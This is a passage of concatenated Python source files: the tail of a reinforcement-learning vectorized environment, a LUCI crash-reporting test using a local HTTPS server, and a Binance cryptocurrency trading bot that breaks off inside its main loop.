action)) self.waiting = True def step_wait(self): results = [remote.recv() for remote in self.remotes] self.waiting = False obs, rews, dones, infos = zip(*results) if self.goal_env: obs = {k: np.stack([o[k] for o in obs]) for k in self.goal_keys} else: obs = np.stack(obs) return obs, np.stack(rews), np.stack(dones), infos def reset(self): for remote in self.remotes: remote.send(('reset', None)) obs = [remote.recv() for remote in self.remotes] if self.goal_env: obs = {k: np.stack([o[k] for o in obs]) for k in self.goal_keys} else: obs = np.stack(obs) return obs def close(self): if self.closed: return if self.waiting: for remote in self.remotes: remote.recv() for remote in self.remotes: remote.send(('close', None)) for process in self.processes: process.join() self.closed = True def render(self, mode='human', *args, **kwargs): for pipe in self.remotes: # gather images from subprocesses # `mode` will be taken into account later pipe.send(('render', (args, {'mode': 'rgb_array', **kwargs}))) imgs = [pipe.recv() for pipe in self.remotes] # Create a big image by tiling images from subprocesses bigimg = tile_images(imgs) if mode == 'human': import cv2 cv2.imshow('vecenv', bigimg[:, :, ::-1]) cv2.waitKey(1) elif mode == 'rgb_array': return bigimg else: raise NotImplementedError def get_images(self): for pipe in self.remotes: pipe.send(('render', {"mode": 'rgb_array'})) imgs = [pipe.recv() for pipe in self.remotes] return imgs def get_attr(self, attr_name, indices=None): """Return attribute from vectorized environment (see base class).""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('get_attr', attr_name)) return [remote.recv() for remote in target_remotes] def set_attr(self, attr_name, value, indices=None): """Set attribute inside vectorized environments (see base class).""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('set_attr', (attr_name, value))) for remote in target_remotes: remote.recv() def env_method(self, method_name, *method_args, indices=None, **method_kwargs): """Call instance methods of vectorized environments.""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('env_method', (method_name, method_args, method_kwargs))) return [remote.recv() for remote in target_remotes] def _get_target_remotes(self, indices): """ Get the connection object needed to communicate with the wanted envs that are in subprocesses. :param indices: (None,int,Iterable) refers to indices of envs. :return: ([multiprocessing.Connection]) Connection object to communicate between processes. """ indices = self._get_indices(indices) return [self.remotes[i] for i in indices] def tile_images(img_nhwc): """ Tile N images into one big PxQ image (P,Q) are chosen to be as close as possible, and if N is square, then P=Q. :param img_nhwc: (list) list or array of images, ndim=4 once turned into array. img nhwc n = batch index, h = height, w = width, c = channel :return: (numpy float) img_HWc, ndim=3 """ img_nhwc = np.asarray(img_nhwc) n_images, height, width, n_channels = img_nhwc.shape # new_height was named H before new_height = int(np.ceil(np.sqrt(n_images))) # new_width was named W before new_width = int(np.ceil(float(n_images) / new_height)) img_nhwc = np.array(list(img_nhwc) + [img_nhwc[0] * 0 for _ in range(n_images, new_height * new_width)]) # img_HWhwc out_image = img_nhwc.reshape(new_height, new_width, height, width, n_channels) # img_HhWwc out_image = out_image.transpose(0, 2, 1, 3, 4) # img_Hh_Ww_c out_image = out_image.reshape(new_height * height, new_width * width, n_channels) return out_image
on_error_test.py
#!/usr/bin/env vpython3 # Copyright 2014 The LUCI Authors. All rights reserved. # Use of this source code is governed under the Apache License, Version 2.0 # that can be found in the LICENSE file. import atexit import cgi import getpass import json import logging import os import platform import re import socket import ssl import subprocess import sys import threading import unittest import six from six.moves import BaseHTTPServer # Mutates sys.path. import test_env # third_party/ from depot_tools import auto_stub from six.moves import urllib from utils import on_error PEM = os.path.join(test_env.TESTS_DIR, 'self_signed.pem') def _serialize_env(): return dict((six.ensure_text(k), six.ensure_text(v.encode('ascii', 'replace'))) for k, v in os.environ.items()) class HttpsServer(BaseHTTPServer.HTTPServer): def __init__(self, addr, cls, hostname, pem): BaseHTTPServer.HTTPServer.__init__(self, addr, cls) self.hostname = hostname self.pem = pem self.socket = ssl.wrap_socket( self.socket, server_side=True, certfile=self.pem) self.keep_running = True self.requests = [] self._thread = None @property def url(self): return 'https://%s:%d' % (self.hostname, self.server_address[1]) def start(self): assert not self._thread def _server_loop(): while self.keep_running: self.handle_request() self._thread = threading.Thread(name='http', target=_server_loop) self._thread.daemon = True self._thread.start() while True: # Ensures it is up. try: urllib.request.urlopen(self.url + '/_warmup').read() except IOError: continue return def stop(self): self.keep_running = False urllib.request.urlopen(self.url + '/_quit').read() self._thread.join() self._thread = None def register_call(self, request): if request.path not in ('/_quit', '/_warmup'): self.requests.append((request.path, request.parse_POST())) class Handler(BaseHTTPServer.BaseHTTPRequestHandler): def log_message(self, fmt, *args): # pylint: disable=arguments-differ logging.debug( '%s - - [%s] %s', self.address_string(), self.log_date_time_string(), fmt % args) def parse_POST(self): ctype, pdict = cgi.parse_header(self.headers['Content-Type']) if ctype == 'multipart/form-data': return cgi.parse_multipart(self.rfile, pdict) if ctype == 'application/x-www-form-urlencoded': length = int(self.headers['Content-Length']) return urllib.parse.parse_qs(self.rfile.read(length), True) if ctype in ('application/json', 'application/json; charset=utf-8'): length = int(self.headers['Content-Length']) return json.loads(self.rfile.read(length)) assert False, ctype return None def do_GET(self): self.server.register_call(self) self.send_response(200) self.send_header('Content-type', 'text/plain') self.end_headers() self.wfile.write(b'Rock on') def do_POST(self): self.server.register_call(self) self.send_response(200) self.send_header('Content-type', 'application/json; charset=utf-8') self.end_headers() data = { 'id': '1234', 'url': 'https://localhost/error/1234', } self.wfile.write(json.dumps(data).encode()) def start_server(): """Starts an HTTPS web server and returns the port bound.""" # A premade passwordless self-signed certificate. It works because older # urllib doesn't verify the certificate validity. Disable SSL certificate # verification for more recent version. create_unverified_https_context = getattr( ssl, '_create_unverified_context', None) # pylint: disable=using-constant-test if create_unverified_https_context: ssl._create_default_https_context = create_unverified_https_context httpd = HttpsServer(('127.0.0.1', 0), Handler, 'localhost', pem=PEM) httpd.start() return httpd class OnErrorBase(auto_stub.TestCase): HOSTNAME = socket.getfqdn() def setUp(self): super(OnErrorBase, self).setUp() os.chdir(test_env.TESTS_DIR) self._atexit = [] self.mock(atexit, 'register', self._atexit.append) self.mock(on_error, '_HOSTNAME', None) self.mock(on_error, '_SERVER', None) self.mock(on_error, '_is_in_test', lambda: False) class OnErrorTest(OnErrorBase): def test_report(self): url = 'https://localhost/' on_error.report_on_exception_exit(url) self.assertEqual([on_error._check_for_exception_on_exit], self._atexit) self.assertEqual('https://localhost', on_error._SERVER.urlhost) self.assertEqual(self.HOSTNAME, on_error._HOSTNAME) with self.assertRaises(ValueError): on_error.report_on_exception_exit(url) def test_no_http(self): # http:// url are denied. url = 'http://localhost/' self.assertIs(False, on_error.report_on_exception_exit(url)) self.assertEqual([], self._atexit) class OnErrorServerTest(OnErrorBase): def call(self, url, arg, returncode): cmd = [sys.executable, '-u', 'main.py', url, arg] logging.info('Running: %s', ' '.join(cmd)) proc = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=os.environ, universal_newlines=True, cwd=os.path.join(test_env.TESTS_DIR, 'on_error')) out = proc.communicate()[0] logging.debug('\n%s', out) self.assertEqual(returncode, proc.returncode) return out def one_request(self, httpd): self.assertEqual(1, len(httpd.requests)) resource, params = httpd.requests[0] self.assertEqual('/ereporter2/api/v1/on_error', resource) self.assertEqual(['r', 'v'], list(params.keys())) self.assertEqual('1', params['v']) return params['r'] def test_shell_out_hacked(self): # Rerun itself, report an error, ensure the error was reported. httpd = start_server() out = self.call(httpd.url, 'hacked', 0) self.assertEqual([], httpd.requests) self.assertEqual('', out) httpd.stop() def test_shell_out_report(self): # Rerun itself, report an error manually, ensure the error was reported. httpd = start_server() out = self.call(httpd.url, 'report', 0) expected = ( 'Sending the report ... done.\n' 'Report URL: https://localhost/error/1234\n' 'Oh dang\n') self.assertEqual(expected, out) actual = self.one_request(httpd) self.assertGreater(actual.pop('duration'), 0.000001) expected = { u'args': [u'main.py', six.text_type(httpd.url), u'report'], u'category': u'report', u'cwd': os.path.join(test_env.TESTS_DIR, 'on_error'), u'env': _serialize_env(), u'hostname': six.text_type(socket.getfqdn()), u'message': u'Oh dang', u'os': six.text_type(sys.platform), u'python_version': six.text_type(platform.python_version()), u'source': u'main.py', u'stack': u'None' if six.PY2 else 'NoneType: None', u'user': six.text_type(getpass.getuser()), # The version was added dynamically for testing purpose. u'version': u'123', } self.assertEqual(expected, actual) httpd.stop() def test_shell_out_exception(self): # Rerun itself, report an exception manually, ensure the error was reported. httpd = start_server() out = self.call(httpd.url, 'exception', 0) expected = ( 'Sending the crash report ... done.\n' 'Report URL: https://localhost/error/1234\n' 'Really\nYou are not my type\n') self.assertEqual(expected, out) actual = self.one_request(httpd) self.assertGreater(actual.pop('duration'), 0.000001) # Remove numbers so editing the code doesn't invalidate the expectation. actual['stack'] = re.sub(r' \d+', ' 0', actual['stack']) expected = { u'args': [u'main.py', six.text_type(httpd.url), u'exception'], u'cwd': os.path.join(test_env.TESTS_DIR, 'on_error'), u'category': u'exception', u'env': _serialize_env(), u'exception_type': u'TypeError', u'hostname': six.text_type(socket.getfqdn()), u'message': u'Really\nYou are not my type', u'os': six.text_type(sys.platform), u'python_version': six.text_type(platform.python_version()), u'source': u'main.py', u'stack': u'Traceback (most recent call last):\n' u' File "main.py", line 0, in run_shell_out\n' u' raise TypeError(\'You are not my type\')\n' u'TypeError: You are not my type', u'user': six.text_type(getpass.getuser()), } self.assertEqual(expected, actual) httpd.stop() def test_shell_out_exception_no_msg(self): # Rerun itself, report an exception manually, ensure the error was reported. httpd = start_server() out = self.call(httpd.url, 'exception_no_msg', 0) expected = ( 'Sending the crash report ... done.\n' 'Report URL: https://localhost/error/1234\n' 'You are not my type #2\n') self.assertEqual(expected, out) actual = self.one_request(httpd) self.assertGreater(actual.pop('duration'), 0.000001) # Remove numbers so editing the code doesn't invalidate the expectation. actual['stack'] = re.sub(r' \d+', ' 0', actual['stack']) expected = { u'args': [u'main.py', six.text_type(httpd.url), u'exception_no_msg'], u'category': u'exception', u'cwd': os.path.join(test_env.TESTS_DIR, 'on_error'), u'env': _serialize_env(), u'exception_type': u'TypeError', u'hostname': six.text_type(socket.getfqdn()), u'message': u'You are not my type #2', u'os': six.text_type(sys.platform), u'python_version': six.text_type(platform.python_version()), u'source': u'main.py', u'stack': u'Traceback (most recent call last):\n' u' File "main.py", line 0, in run_shell_out\n' u' raise TypeError(\'You are not my type #2\')\n' u'TypeError: You are not my type #2', u'user': six.text_type(getpass.getuser()), } self.assertEqual(expected, actual) httpd.stop() def test_shell_out_crash(self): # Rerun itself, report an error with a crash, ensure the error was reported. httpd = start_server() out = self.call(httpd.url, 'crash', 1) expected = ( u'Traceback (most recent call last):\n' u' File "main.py", line 0, in <module>\n' u' sys.exit(run_shell_out(*sys.argv[1:]))\n' u' File "main.py", line 0, in run_shell_out\n' u' raise ValueError(\'Oops\')\n' u'ValueError: Oops\n' u'Sending the crash report ... done.\n' u'Report URL: https://localhost/error/1234\n' u'Process exited due to exception\n' u'Oops\n') # Remove numbers so editing the code doesn't invalidate the expectation. self.assertEqual(expected, re.sub(r' \d+', ' 0', out)) actual = self.one_request(httpd) # Remove numbers so editing the code doesn't invalidate the expectation. actual['stack'] = re.sub(r' \d+', ' 0', actual['stack']) self.assertGreater(actual.pop('duration'), 0.000001) expected = { u'args': [u'main.py', six.text_type(httpd.url), u'crash'], u'category': u'exception', u'cwd': os.path.join(test_env.TESTS_DIR, 'on_error'), u'env': _serialize_env(), u'exception_type': u'ValueError', u'hostname': six.text_type(socket.getfqdn()), u'message': u'Process exited due to exception\nOops', u'os': six.text_type(sys.platform), u'python_version': six.text_type(platform.python_version()), u'source': u'main.py', # The stack trace is stripped off the heading and absolute paths. u'stack': u'File "main.py", line 0, in <module>\n' u' sys.exit(run_shell_out(*sys.argv[1:]))\n' u'File "main.py", line 0, in run_shell_out\n' u' raise ValueError(\'Oops\')', u'user': six.text_type(getpass.getuser()), } self.assertEqual(expected, actual) httpd.stop() def test_shell_out_crash_server_down(self): # Rerun itself, report an error, ensure the error was reported. out = self.call('https://localhost:1', 'crash', 1) expected = ( u'Traceback (most recent call last):\n' u' File "main.py", line 0, in <module>\n' u' sys.exit(run_shell_out(*sys.argv[1:]))\n' u' File "main.py", line 0, in run_shell_out\n' u' raise ValueError(\'Oops\')\n' u'ValueError: Oops\n' u'Sending the crash report ... failed!\n' u'Process exited due to exception\n' u'Oops\n') # Remove numbers so editing the code doesn't invalidate the expectation. self.assertEqual(expected, re.sub(r' \d+', ' 0', out)) if __name__ == '__main__': # Ignore _DISABLE_ENVVAR if set. os.environ.pop(on_error._DISABLE_ENVVAR, None) test_env.main()
Binance Detect Moonings.py
""" Disclaimer All investment strategies and investments involve risk of loss. Nothing contained in this program, scripts, code or repositoy should be construed as investment advice.Any reference to an investment's past or potential performance is not, and should not be construed as, a recommendation or as a guarantee of any specific outcome or profit. By using this program you accept all liabilities, and that no claims can be made against the developers, or others connected with the program. """ # use for environment variables import os # use if needed to pass args to external modules import sys # used to create threads & dynamic loading of modules import threading import importlib # used for directory handling import glob # Needed for colorful console output Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC) from colorama import init init() # needed for the binance API / websockets / Exception handling from binance.client import Client from binance.exceptions import BinanceAPIException from requests.exceptions import ReadTimeout, ConnectionError # used for dates from datetime import date, datetime, timedelta import time # used to repeatedly execute the code from itertools import count # used to store trades and sell assets import json # Load helper modules from helpers.parameters import ( parse_args, load_config ) # Load creds modules from helpers.handle_creds import ( load_correct_creds, test_api_key ) from playsound import playsound # for colourful logging to the console class txcolors: BUY = '\033[92m' WARNING = '\033[93m' SELL_LOSS = '\033[91m' SELL_PROFIT = '\033[32m' DIM = '\033[2m\033[35m' DEFAULT = '\033[39m' # tracks profit/loss each session global session_profit session_profit = 0 # print with timestamps old_out = sys.stdout class St_ampe_dOut: """Stamped stdout.""" nl = True def write(self, x): """Write function overloaded.""" if x == '\n': old_out.write(x) self.nl = True elif self.nl: old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}') self.nl = False else: old_out.write(x) def flush(self): pass sys.stdout = St_ampe_dOut() def get_price(add_to_historical=True): '''Return the current price for all coins on binance''' global historical_prices, hsp_head initial_price = {} prices = client.get_all_tickers() for coin in prices: if CUSTOM_LIST: if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS): initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()} else: if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS): initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()} if add_to_historical: hsp_head += 1 if hsp_head == RECHECK_INTERVAL: hsp_head = 0 historical_prices[hsp_head] = initial_price return initial_price def wait_for_price(): '''calls the initial price and ensures the correct amount of time has passed before reading the current price again''' global historical_prices, hsp_head, volatility_cooloff volatile_coins = {} externals = {} coins_up = 0 coins_down = 0 coins_unchanged = 0 pause_bot() if historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)): # sleep for exactly the amount of time required time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds()) print(f'Working...Session profit:{session_profit:.2f}% Est:${(QUANTITY * session_profit)/100:.2f}') # retreive latest prices get_price() # calculate the difference in prices for coin in historical_prices[hsp_head]: # minimum and maximum prices over time period min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price'])) max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price'])) threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100 # each coin with higher gains than our CHANGE_IN_PRICE is added to the volatile_coins dict if less than MAX_COINS is not reached. if threshold_check > CHANGE_IN_PRICE: coins_up +=1 if coin not in volatility_cooloff: volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE) # only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE): volatility_cooloff[coin] = datetime.now() if len(coins_bought) + len(volatile_coins) < MAX_COINS or MAX_COINS == 0: volatile_coins[coin] = round(threshold_check, 3) print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, calculating volume in {PAIR_WITH}') else: print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are holding max number of coins{txcolors.DEFAULT}') elif threshold_check < CHANGE_IN_PRICE: coins_down +=1 else: coins_unchanged +=1 # Disabled until fix #print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}') # Here goes new code for external signalling externals = external_signals() exnumber = 0 for excoin in externals: if excoin not in volatile_coins and excoin not in coins_bought and \ (len(coins_bought) + exnumber + len(volatile_coins)) < MAX_COINS: volatile_coins[excoin] = 1 exnumber +=1 print(f'External signal received on {excoin}, calculating volume in {PAIR_WITH}') return volatile_coins, len(volatile_coins), historical_prices[hsp_head] def external_signals(): external_list = {} signals = {} # check directory and load pairs from files into external_list signals = glob.glob("signals/*.exs") for filename in signals: for line in open(filename): symbol = line.strip() external_list[symbol] = symbol try: os.remove(filename) except: if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}') return external_list def pause_bot(): '''Pause the script when exeternal indicators detect a bearish trend in the market''' global bot_paused, session_profit, hsp_head # start counting for how long the bot's been paused start_time = time.perf_counter() while os.path.isfile("signals/paused.exc"): if bot_paused == False: print(f'{txcolors.WARNING}Pausing buying due to change in market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}') bot_paused = True # Sell function needs to work even while paused coins_sold = sell_coins() remove_from_portfolio(coins_sold) update_coin(coins_bought_file_path, 'stop_loss', 'take_profit') get_price(True) # pausing here if hsp_head == 1: print(f'Paused...Session profit:{session_profit:.2f}% Est:${(QUANTITY * session_profit)/100:.2f}') time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL) else: # stop counting the pause time stop_time = time.perf_counter() time_elapsed = timedelta(seconds=int(stop_time-start_time)) # resume the bot and ser pause_bot to False if bot_paused == True: print(f'{txcolors.WARNING}Resuming buying due to change in market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}') bot_paused = False return def convert_volume(): '''Converts the volume given in QUANTITY from USDT to the each coin's volume''' volatile_coins, number_of_coins, last_price = wait_for_price() lot_size = {} volume = {} for coin in volatile_coins: # Find the correct step size for each coin # max accuracy for BTC for example is 6 decimal points # while XRP is only 1 try: info = client.get_symbol_info(coin) step_size = info['filters'][2]['stepSize'] lot_size[coin] = step_size.index('1') - 1 if lot_size[coin] < 0: lot_size[coin] = 0 except: pass # calculate the volume in coin from QUANTITY in USDT (default) volume[coin] = float(QUANTITY / float(last_price[coin]['price'])) # define the volume with the correct step size if coin not in lot_size: volume[coin] = float('{:.1f}'.format(volume[coin])) else: # if lot size has 0 decimal points, make the volume an integer if lot_size[coin] == 0: volume[coin] = int(volume[coin]) else: volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin])) return volume, last_price def buy(): '''Place Buy market orders for each volatile coin found''' volume, last_price = convert_volume() orders = {} for coin in volume: # only buy if the there are no active trades on the coin if coin not in coins_bought: print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}") if TEST_MODE: orders[coin] = [{ 'symbol': coin, 'orderId': 0, 'time': datetime.now().timestamp() }] # Log trade if LOG_TRADES: write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}") continue # try to create a real order if the test orders did not raise an exception try: buy_limit = client.create_order( symbol = coin, side = 'BUY', type = 'MARKET', quantity = volume[coin] ) # error handling here in case position cannot be placed except Exception as e: print(e) # run the else block if the position has been placed and return order info else: orders[coin] = client.get_all_orders(symbol=coin, limit=1) # binance sometimes returns an empty list, the code will wait here until binance returns the order while orders[coin] == []: print('Binance is being slow in returning the order, calling the API again...') orders[coin] = client.get_all_orders(symbol=coin, limit=1) time.sleep(1) else: playsound('audio_files/buy.mp3') print('Order returned, saving order to file') # Log trade if LOG_TRADES: write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}") else: print(f'Signal detected, but there is already an active trade on {coin}') return orders, last_price, volume def sell_coins(): '''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold''' global hsp_head, session_profit last_price = get_price(False) # don't populate rolling window #last_price = get_price(add_to_historical=True) # don't populate rolling window coins_sold = {} for coin in list(coins_bought): # define stop loss and take profit TP = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['take_profit']) / 100 SL = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['stop_loss']) / 100 LastPrice = float(last_price[coin]['price']) BuyPrice = float(coins_bought[coin]['bought_at']) PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100) # check that the price is above the take profit and readjust SL and TP accordingly if trialing stop loss used if LastPrice > TP and USE_TRAILING_STOP_LOSS: # increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL) coins_bought[coin]['take_profit'] = PriceChange + TRAILING_TAKE_PROFIT coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS if DEBUG: print(f"{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.2f} and SL {coins_bought[coin]['stop_loss']:.2f} accordingly to lock-in profit") continue # check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case if LastPrice < SL or LastPrice > TP and not USE_TRAILING_STOP_LOSS: print(f"{txcolors.SELL_PROFIT if PriceChange > 0. else txcolors.SELL_LOSS}TP or SL reached, selling {coins_bought[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} : {PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}") # try to create a real order try: if not TEST_MODE: sell_coins_limit = client.create_order( symbol = coin, side = 'SELL', type = 'MARKET', quantity = coins_bought[coin]['volume'] ) # error handling here in case position cannot be placed except Exception as e: print(e) # run the else block if coin has been sold and create a dict for each coin sold else: coins_sold[coin] = coins_bought[coin] # prevent system from buying this coin for the next TIME_DIFFERENCE minutes volatility_cooloff[coin] = datetime.now() # Log trade if LOG_TRADES: profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume'])* (1-(TRADING_FEE*2)) # adjust for trading fee here write_log(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit:.2f} {PriceChange-(TRADING_FEE*2):.2f}%") playsound('audio_files/sell.mp3') session_profit=session_profit + (PriceChange-(TRADING_FEE*2)) continue # no action; print once every TIME_DIFFERENCE if hsp_head == 1: if len(coins_bought) > 0: print(f'TP or SL not yet reached, not selling {coin} for now {BuyPrice} - {LastPrice} : {txcolors.SELL_PROFIT if PriceChange > 0. else txcolors.SELL_LOSS}{PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}') if hsp_head == 1 and len(coins_bought) == 0: print(f'Not holding any coins') return coins_sold def update_coin(json_object, param1, param2): """ Updates 2 values in any coin's json data. param1: the coin's SL/TP param2: the coin's SL/TP Example: "EXAMPLECOIN": { "symbol": "EXAMPLECOIN", "orderid": 483289970, "timestamp": 1623244344267, "bought_at": "14.25700000", "volume": 2.104, "stop_loss": -1, <--- will change any 2 of these values "take_profit": 10 """ pass with open(coins_bought_file_path, "r") as jsonFile: updated_coins = {} coins = json.load(jsonFile) for coin in coins: coins[coin][param1] = TAKE_PROFIT coins[coin][param2] = -STOP_LOSS updated_coins[coin] = coins[coin] jsonFile.close() with open(coins_bought_file_path, "w") as jsonFile: json.dump(updated_coins, jsonFile, indent=4) def update_portfolio(orders, last_price, volume): '''add every coin bought to our portfolio for tracking/selling later''' if DEBUG: print(orders) for coin in orders: coins_bought[coin] = { 'symbol': orders[coin][0]['symbol'], 'orderid': orders[coin][0]['orderId'], 'timestamp': orders[coin][0]['time'], 'bought_at': last_price[coin]['price'], 'volume': volume[coin], 'stop_loss': -STOP_LOSS, 'take_profit': TAKE_PROFIT, } # save the coins in a json file in the same directory with open(coins_bought_file_path, 'w') as file: json.dump(coins_bought, file, indent=4) print(f'Order with id {orders[coin][0]["orderId"]} placed and saved to file') def remove_from_portfolio(coins_sold): '''Remove coins sold due to SL or TP from portfolio''' for coin in coins_sold: coins_bought.pop(coin) with open(coins_bought_file_path, 'w') as file: json.dump(coins_bought, file, indent=4) def write_log(logline): timestamp = datetime.now().strftime("%d/%m %H:%M:%S") with open(LOG_FILE,'a+') as f: f.write(timestamp + ' ' + logline + '\n') def _count_text_lines(file_name): with open(file_name) as f: for i, l in enumerate(f): pass return i + 1 def log_session_profit(file_name): """ Logs session profit/losses to file_name """ f = open(file_name, "r+") print(f"Session {_count_text_lines(file_name)} ended. Profits recorded in {file_name}.") string = f"===== {datetime.date(datetime.now())} =====\n" if string not in f: print(string, str(f)) f.write(string) f.write(f"Session # {str(_count_text_lines(file_name))} profit: $ {(QUANTITY * session_profit)/100:.2f} \n") f.close() sys.exit() if __name__ == '__main__': # Load arguments then parse settings args = parse_args() mymodule = {} # set to false at Start global bot_paused bot_paused = False DEFAULT_CONFIG_FILE = 'config.yml' DEFAULT_CREDS_FILE = 'creds.yml' config_file = args.config if args.config else DEFAULT_CONFIG_FILE creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE parsed_config = load_config(config_file) parsed_creds = load_config(creds_file) # Default no debugging DEBUG = False # Load system vars TEST_MODE = parsed_config['script_options']['TEST_MODE'] LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES') LOG_FILE = parsed_config['script_options'].get('LOG_FILE') DEBUG_SETTING = parsed_config['script_options'].get('DEBUG') AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER') # Load trading vars PAIR_WITH = parsed_config['trading_options']['PAIR_WITH'] QUANTITY = parsed_config['trading_options']['QUANTITY'] MAX_COINS = parsed_config['trading_options']['MAX_COINS'] FIATS = parsed_config['trading_options']['FIATS'] TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE'] RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL'] CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE'] STOP_LOSS = parsed_config['trading_options']['STOP_LOSS'] TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT'] CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST'] TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST'] USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS'] TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS'] TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT'] TRADING_FEE = parsed_config['trading_options']['TRADING_FEE'] SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES'] if DEBUG_SETTING or args.debug: DEBUG = True # Load creds for correct environment access_key, secret_key = load_correct_creds(parsed_creds) if DEBUG: print(f'loaded config below\n{json.dumps(parsed_config, indent=4)}') print(f'Your credentials have been loaded from {creds_file}') # Authenticate with the client, Ensure API key is good before continuing if AMERICAN_USER: client = Client(access_key, secret_key, tld='us') else: client = Client(access_key, secret_key) # If the users has a bad / incorrect API key. # this will stop the script from starting, and display a helpful error. api_ready, msg = test_api_key(client, BinanceAPIException) if api_ready is not True: exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}') # Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True if CUSTOM_LIST: tickers=[line.strip() for line in open(TICKERS_LIST)] # try to load all the coins bought by the bot if the file exists and is not empty coins_bought = {} # path to the saved coins_bought file coins_bought_file_path = 'coins_bought.json' # rolling window of prices; cyclical queue historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL) hsp_head = -1 # prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago volatility_cooloff = {} # use separate files for testing and live trading if TEST_MODE: coins_bought_file_path = 'test_' + coins_bought_file_path # if saved coins_bought json file exists and it's not empty then load it if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size!= 0: with open(coins_bought_file_path) as file: coins_bought = json.load(file) print('Press Ctrl-Q to stop the script') if not TEST_MODE: if not args.notimeout: # if notimeout skip this (fast for dev tests) print('WARNING: You are using the Mainnet and live funds. Waiting 5 seconds as a security measure') time.sleep(5) signals = glob.glob("signals/*.exs") for filename in signals: for line in open(filename): try: os.remove(filename) except: if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}') if os.path.isfile("signals/paused.exc"): try: os.remove("signals/paused.exc") except: if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}') # load signalling modules try: if len(SIGNALLING_MODULES) > 0: for module in SIGNALLING_MODULES: print(f'Starting {module}') mymodule[module] = importlib.import_module(module) t = threading.Thread(target=mymodule[module].do_work, args=()) t.daemon = True t.start() time.sleep(2) else: print(f'No modules to load {SIGNALLING_MODULES}') except Exception as e: print(e) # seed initial prices get_price() READ_TIMEOUT_COUNT=0 CONNECTION_ERROR_COUNT = 0 while True: try: update_coin(coins_bought_file_path, 'stop_loss', 'take_profit') # Update SL/TP of all coins in coins_bought.json: orders, last_price, volume = buy() update_portfolio(orders, last_price, volume) coins_sold = sell_coins() remove_from_portfolio(coins_sold) except ReadTimeout as rt: 